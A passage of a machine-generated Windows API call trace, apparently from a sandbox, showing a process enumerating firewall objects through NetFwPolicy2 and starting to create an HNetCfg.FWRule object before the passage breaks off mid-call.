wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.631] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.631] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.632] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.632] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.632] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.633] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.633] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.633] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.633] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.634] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.634] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.635] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.635] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.635] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.635] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.636] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.636] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.637] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.637] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.637] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.637] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.638] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.638] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.639] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.639] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.639] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.639] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.640] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.640] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.641] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.641] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.641] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.641] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.642] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.642] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.642] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.643] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.643] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.643] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.644] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.644] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.644] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.645] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.645] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.645] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.646] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.646] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.646] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.646] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.647] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.647] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.648] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.648] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.648] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.648] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.649] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.649] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.649] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.650] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.650] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.650] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.651] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.651] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.651] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.651] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.656] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.657] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.657] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.657] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.658] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.658] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.658] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.659] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.659] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.659] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.660] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.660] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.660] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.660] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.661] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.661] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.662] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.662] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.662] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.662] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.663] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.663] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.663] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.664] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.664] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.664] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.665] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.665] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.665] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.666] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.666] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.666] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.667] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.667] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.667] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.668] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.668] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.668] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.669] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.669] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.669] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.669] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.670] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.670] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.671] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.671] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.671] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.671] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.672] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.672] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.672] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.673] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.673] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.673] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.674] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.674] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.674] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.675] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.675] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.675] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.676] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.676] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.676] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.676] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.677] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.677] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.678] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.678] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.678] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.678] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.679] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.679] NetFwPolicy2:IUnknown:AddRef (This=0x1876fb0) returned 0x2 [0228.679] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0228.680] NetFwPolicy2:IUnknown:AddRef (This=0x1877230) returned 0x2 [0228.680] IEnumVARIANT:Next (in: This=0x1876f60, celt=0x1, rgvar=0x25eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1 [0228.680] IUnknown:Release (This=0x1876f60) returned 0x0 [0228.749] CLSIDFromProgIDEx (in: lpszProgID="HNetCfg.FWRule", lpclsid=0x25e9c8 | out: lpclsid=0x25e9c8*(Data1=0x2c5bc43e, Data2=0x3369, Data3=0x4c33, Data4=([0]=0xab, [1]=0xc, [2]=0xbe, [3]=0x94, [4]=0x69, [5]=0x67, [6]=0x7a, [7]=0xf4))) returned 0x0 [0228.750] SysStringLen (param_1=0x0) returned 0x0 [0228.750] CoGetClassObject (in: rclsid=0x25e9c8*(Data1=0x2c5bc43e, Data2=0x3369, Data3=0x4c33, Data4=([0]=0xab, [1]=0xc, [2]=0xbe, [3]=0x94, [4]=0x69, [5]=0x67, [6]=0x7a, [7]=0xf4)), dwClsContext=0x15, pvReserved=0x0, riid=0x6c4c4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e9b8 | out: ppv=0x25e9b8*=0x1876f60) returned 0x0 [0228.751] NetFwPolicy2:IUnknown:QueryInterface (in: This=0x1876f60, riid=0x6c4d1100*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x25e9b4 | out: ppvObject=0x25e9b4*=0x0) returned 0x80004002 [0228.751] NetFwPolicy2:IClassFactory:CreateInstance (in: This=0x1876f60, pUnkOuter=0x0, riid=0x6c4c40a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e9bc | out: ppvObject=0x25e9bc*=0x1876f90) returned 0x0 [0228.751] NetFwPolicy2:IUnknown:Release (This=0x1876f60) returned 0x1 [0228.751] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4d0580*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x25e980 | out: ppvObject=0x25e980*=0x0) returned 0x80004002 [0228.751] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c4140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e970 | out: ppvObject=0x25e970*=0x1876f90) returned 0x0 [0228.751] IUnknown:AddRef (This=0x1876f90) returned 0x3 [0228.751] IUnknown:Release (This=0x1876f90) returned 0x2 [0228.751] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.751] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.751] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.752] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Name", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=1) returned 0x0 [0228.752] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.752] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.752] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=1, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, 